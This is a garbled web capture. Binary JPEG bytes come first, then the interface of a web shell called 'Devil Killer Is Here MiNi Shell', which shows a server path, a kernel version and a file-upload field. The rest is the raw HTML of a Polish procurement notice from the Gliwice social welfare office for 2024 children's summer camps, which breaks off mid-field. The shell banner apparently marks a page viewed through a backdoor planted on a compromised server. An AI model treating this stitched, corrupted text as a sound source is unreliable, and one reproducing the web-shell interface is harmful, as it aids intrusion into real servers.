JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240527/0034088101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kolonie letnie 2024 z programem profilaktycznym dla dzieci zagrożonych wykluczeniem społecznym </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OŚRODEK POMOCY SPOŁECZNEJ W GLIWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003451973</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Górnych Wałów 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 335 97 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">32 230 80 27</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ops@ops.gliwice.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://opsgliwice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kolonie letnie 2024 z programem profilaktycznym dla dzieci zagrożonych wykluczeniem społecznym </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b79186da-18f0-11ef-bfd3-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00340881</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00029591/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Zorganizowanie kolonii letnich z programem profilaktycznym dla dzieci</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b79186da-18f0-11ef-bfd3-e6cc5d6d04e5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) w postępowaniu o udzielenie zamówienia publicznego<br/>komunikacja miedzy Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2) Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej na adres e-mail: ops@ops.gliwice.eu (nie dotyczy składania ofert)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”,<br/>2) przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania,<br/>3) sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami<br/>określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych,<br/>4) dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, wskazane w rozdziale &#34;Dokumenty lub oświadczenia, składane w toku<br/>postępowania o zamówienie publiczne&#34; oraz &#34;Opis sposobu przygotowania i składania oferty&#34; niniejszej specyfikacji, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (KIR), z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. Ponadto, do kompresji (zmniejszenia objętości) dokumentów elektronicznych Zamawiający dopuszcza również<br/>możliwość przekazywania dokumentów w formacie &#34;.rar&#34;, natomiast do danych zawierających informacje graficzną - format &#34;.bmp&#34;.<br/>Preferowane przez Zamawiającego formaty:<br/>a) danych: .pdf, .doc, .docx, .rtf, .odt, .ods, .xls, .xlsx, .jpg (.jpeg);<br/>b) kompresji dokumentów elektronicznych: .zip, .7z.<br/>W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania,<br/>5) informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Radym Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a) w formatach danych określonych w pkt 4) i przekazuje się jako załącznik, lub<br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej, np. w treści wiadomości e-mail (nie dotyczy składania ofert) lub w treści &#34;Formularza do komunikacji&#34;,<br/>6) jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnice przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r.<br/>o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz<br/>z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnice przedsiębiorstwa” – dotyczy zarówno etapu składania ofert oraz dokumentów/oświadczeń składanych w toku postępowania o zamówienie<br/>publiczne.<br/><br/>Szczegółowe informacje zawarte są w rozdziale 12. SWZ &#34;Informacje o środkach komunikacji elektronicznej&#34;.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja zawarta w rozdziale 27. SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OPS-ZP.321.9.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> A. Wymagania dotyczące ośrodka wypoczynkowego:<br/>-miejscowość na terenie Polski w odległości drogowej maksymalnie do 300 km od siedziby Ośrodka Pomocy Społecznej w Gliwicach, ul. Górnych Wałów 9;<br/>-liczba miejsc wystarczająca na zabezpieczenie w trakcie trwania realizacji zamówienia pobytu maksymalnie: 38 dzieci w jednym turnusie;<br/>-teren ośrodka musi być uporządkowany, oświetlony i ogrodzony;<br/>-zakwaterowanie uczestników nastąpi maksymalnie na czterech kondygnacjach nadziemnych w jednym budynku. Kondygnacja nadziemna rozumiana zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (tj, Dz.U. z 2022r. poz.1225.);<br/>-nie dopuszcza się zakwaterowania dzieci w kilku budynkach;<br/>-pokoje wychowawców powinny się znajdować na tych samych kondygnacjach co pokoje dzieci;<br/>-zgodnie z Rozporządzeniem Ministra Edukacji Narodowej w sprawie wypoczynku dzieci i młodzieży z dnia 30 marca 2016r. (Dz.U. z 2016r. poz.452 ) obiekt, w którym będzie zorganizowany wypoczynek musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określonych przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska. Organizator wypoczynku jest obowiązany zapewnić uczestnikom wypoczynku bezpieczne i higieniczne warunki w czasie wypoczynku. Budynek wraz z przyległym terenem powinien być pozbawiony przedmiotów i urządzeń mogących stwarzać zagrożenie dla bezpieczeństwa dzieci.<br/>-sala - świetlica ze sprzętem RTV, sprzętem nagłośniającym do organizacji dyskotek, przystosowana do prowadzenia zajęć dydaktycznych i wyposażona w gry planszowe, książki i czasopisma. Sala powinna pomieścić jednorazowo co najmniej 38 dzieci oraz wychowawców;<br/>-możliwość nieodpłatnego i nieograniczonego korzystania z boiska bez konieczności dojazdu oraz ze sprzętu sportowego niezbędnego do uatrakcyjnienia zajęć w ilości dostosowanej do liczby uczestników przebywających na poszczególnych turnusach<br/>B. Termin, tryb i sposób realizacji zadania<br/>-w okresie pomiędzy 01.07.2023 r. – do 31.08.2023 r.<br/>-maksymalna liczba uczestników jednego turnusu: 38 miejsc<br/>-minimalna liczba uczestników jednego turnusu wynosi 30 osób<br/>-liczba dni trwania turnusu -7 dni (6 noclegów).<br/>C. Warunki zakwaterowania<br/>-pokoje maksymalnie 4 osobowe z dostępem do okna, przy zachowaniu 4m2 powierzchni noclegowej na jedną osobę, przy założeniu że w jednym pokoju są uczestnicy z tej samej grupy, w której prowadzi się zajęcia w trakcie wypoczynku;<br/>-każdy pokój powinien być wyposażony w łóżka lub tapczany jednoosobowe (wyklucza się łóżka polowe i tzw. dostawki) z pościelą i kocem dla każdego dziecka (z możliwością wymiany w razie zabrudzenia);<br/>-łóżka muszą być tak ustawione, aby umożliwiały swobodne przejście;<br/>-każdy pokój musi być wyposażony w szafę z wieszakami i pólkami w ilości zapewniającej rozpakowanie bagażu przez każde dziecko zakwaterowane w pokoju oraz w stół i krzesła;<br/>-meble powinny być sprawne technicznie;<br/>-nie dopuszcza się zakwaterowania dzieci w pokojach przejściowych;<br/>-wszystkie pokoje z dostępem do pełnego węzła sanitarnego wewnątrz budynku i na piętrach, na których zakwaterowane będą dzieci, z bieżącą zimną i ciepią wodą bez ograniczeń;<br/>-łazienki muszą być sprzątane codziennie;<br/>-liczba urządzeń sanitarnych i warunki sanitarne w łazienkach powinny być zgodne z rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (tj. Dz. U. z 2022 r. poz. 1225);<br/>-możliwość korzystania z ogrzewania pokoi na wniosek uczestników w przypadku, gdy temperatura wewnątrz budynku spadnie do 18 stopni C;<br/>-obiekt powinien dysponować izolatką z dostępem do węzła sanitarnego.<br/>D. Warunki żywienia<br/>-stołówka usytuowana na terenie obiektu kolonijnego, dopuszcza się lokalizację w osobnym budynku;<br/>- stołówka i kuchnia powinna spełniać wymogi stacji sanitarno-epidemiologicznej<br/>-w ciągu każdego dnia pobytu zapewnione cztery posiłki: śniadanie, obiad, podwieczorek, kolacja;<br/>• Śniadanie: pieczywo, masło, wędliny, sery, warzywa, płatki śniadaniowe, mleko, jogurty, herbata, kakao, kawa.<br/>• Obiad: serwowany do stołu składający się z: zupy i drugiego dania z sałatkami, do obiadu napoje: kompot, woda mineralna, soki owocowe.<br/>• Kolacja: produkty podobne jak przy śniadaniu, mile widziane dania ciepłe, typu kiełbaski z wody lub rożna, pieczony drób, smażone ryby<br/>-w dniu przyjazdu dzieci na kolonie zapewniony obiad, a w dniu wyjazdu dzieci z kolonii przynajmniej śniadanie;<br/>-posiłki urozmaicone odpowiadające normom żywienia opracowanym przez Instytut Żywności i Żywienia zarówno pod względem ilości jak i jakości oraz wartości odżywczych, bogate w witaminy, duża ilość owoców i warzyw;<br/>-w czasie trwania pobytu zapewniony całodobowy dostęp do pieczywa oraz niskosłodzonego napoju lub wody;<br/>-suchy prowiant na drogę powrotną oraz na wszystkie ewentualne całodniowe wycieczki zorganizowane w czasie trwania turnusu.<br/>E. Transport uczestników<br/>-wykonawca zabezpiecza przewóz dzieci wraz z opieką na trasie Gliwice – miejsce docelowe oraz miejsce docelowe - Gliwice;<br/>-wykonawca zabezpiecza przejazd wszystkich uczestników turnusu w tym samym czasie autokarem/autokarami przeznaczonymi tylko do dyspozycji Organizatora;<br/>-liczba autokarów dostosowana do ilości uczestników;<br/>-autokar/autokary z czynną kabiną WC;<br/>-transport będzie zorganizowany zgodnie z ustawą z dnia 20 czerwca 1997 r. Prawo o Ruchu Drogowym (Dz.U. z 2023 r. poz. 1047);<br/>Organizator w dniu wyjazdu dzieci na kolonie jest zobowiązany przedstawić zaświadczenie o sprawdzeniu, bezpośrednio przed wyjazdem, przez odpowiednie służby stanu technicznego autokarów, którymi przewożone będą dzieci;<br/>-w razie wykazania przez organy kontroli niesprawności autokarów, wykonawca jest zobowiązany w ciągu 1 h do podstawienia sprawnych pojazdów zastępczych;<br/>-w czasie upałów wykonawca zobowiązuje się zapewnić wodę do picia dla dzieci na czas przejazdów na trasie Gliwice – miejsce docelowe oraz miejsce docelowe - Gliwice;.<br/>-postój w trakcie transportu powinien być zapewniony w miejscach gwarantujących ograniczony do minimum kontakt z osobami trzecimi;<br/>-zbiórka przed wyjazdem powinna być zorganizowana na terenie Gliwic w miejscu zapewniającym przestrzeń dla zachowania dystansu społecznego, jej miejsce zostanie ustalone z wyłonionym Wykonawcą przed podpisaniem umowy. Rodzice/opiekunowie odprowadzający dzieci nie powinni wchodzić do autokaru.<br/>F. Program wypoczynku:-Program profilaktyki uzależnień dla dzieci – realizowany zgodnie ze złożoną ofertą.<br/>Program powinien obejmować np. bloki tematyczne dotyczące relacji interpersonalnych, kształtowania umiejętności w zakresie rozwiązywania problemów uzależnień, stresu, agresji<br/>i innych emocji oraz zagrożeń płynących z kontaktu dzieci i młodzieży ze środkami psychoaktywnymi.<br/>Realizacja programu podczas kolonii - minimum 10 h zajęć profilaktycznych dla wszystkich dzieci w czasie trwania każdego turnusu, przez osoby takie jak terapeuta uzależnień, pedagog, socjoterapeutka, pracownik socjalnym realizującym program profilaktyczny.<br/>- Program kulturalno – sportowo – rekreacyjny – realizowany zgodnie ze złożoną ofertą*.<br/>Organizator zobowiązany jest zorganizować co najmniej jedne zajęcia bądź zawody sportowe dla dzieci i młodzieży oraz co najmniej jedną dyskotekę.<br/>Organizator musi zagwarantować dostępu do boiska na terenie ośrodka.<br/>Organizator zobowiązany jest zorganizować co najmniej jedną wycieczkę pieszą lub autokarową gdzie plan wycieczki będzie uwzględniał możliwości turystyczne i kulturowe regionu np.: szlaki edukacyjne, zwiedzanie okolicznych pomników, miejsc pamięci, oraz innych charakterystycznych dla okolicy atrakcji turystycznych z zapewnieniem przez Organizatora opłacenia wszystkich biletów wstępu do zwiedzanych obiektów.<br/>Organizator wypoczynku zorganizuje jedno wyjście do Aquaparku.<br/>G. Kadra:<br/>- kierownik i wychowawcy posiadający uprawnienia zgodne z Rozporządzeniem Ministra Edukacji Narodowej w sprawie wypoczynku dzieci i młodzieży z dnia 30 marca 2016r. (Dz. U. z 2016 r. poz. 452.),<br/>- osoba realizująca program profilaktyczny,**<br/>- animator zajęć sportowych**<br/>**animator i osoba realizująca program profilaktyczny nie może jednocześnie pełnić funkcji kierownika lub wychowawcy<br/>Osoby zatrudnione przez Wykonawcę powinny posiadać minimum roczne doświadczenie<br/>w pracy dydaktycznej, wychowawczej lub opiekuńczej z dziećmi. Ponadto wychowawcy powinni posiadać udokumentowane doświadczenie w pracy jako wychowawca na co najmniej 3 turnusach wypoczynku (kolonii, obozu, zimowiska). Kierownik powinien posiadać udokumentowane doświadczenie w pracy jako kierownik kolonii na co najmniej 3 turnusach wypoczynku (kolonii, obozu, zimowiska).<br/>Organizator musi dysponować Terapeutą uzależnień/ pedagogiem/ socjoterapeutą/ pracownikiem socjalnym realizującym program profilaktyczny, który musi posiadać przynajmniej roczne udokumentowane doświadczenie w prowadzeniu zajęć z osobami dorosłymi/dziećmi lub młodzieżą z zakresu profilaktyki uzależnień.<br/>Osoby zatrudnione przez Wykonawcę muszą zostać sprawdzone w Rejestrze Sprawców Przestępstw na Tle Seksualnym (RSPTS), zgodnie z ustawą z dnia 13 maja 2016r.<br/>o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym (tekst jednolity Dz. U. z 2023r. poz. 31)., oraz o niekaralności w Krajowym Rejestrze Karnym Sądu Rejonowego zgodnie z art. 21 ust. 3 Ustawy z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym i ochronie małoletnich. Wydruk z rejestru należy dołączyć do dokumentacji kadry. Wychowawcy oraz kierownik kolonii powinni być obecni na terenie ośrodka przez cały okres pobytu dzieci na kolonii (za wyjątkiem ewentualnych wycieczek).<br/>CAŁKOWITY OPIS PRZEDMIOTU ZAMÓWIENIA ZNAJDUJE SIĘ W ZAŁĄCZNIKU NR 7 DO SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55243000-5 - Usługi w zakresie obozowisk dla dzieci</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">63500000-4 - Usługi biur podróży, podmiotów turystycznych i pomocy turystycznej</p> <p class="mb-0">55100000-1 - Usługi hotelarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie kryteriów oceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">atrakcyjność lokalizacji obiektu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">standard sanitarny w obiekcie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">program rozrywkowo - rekreacyjno-sportowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">program 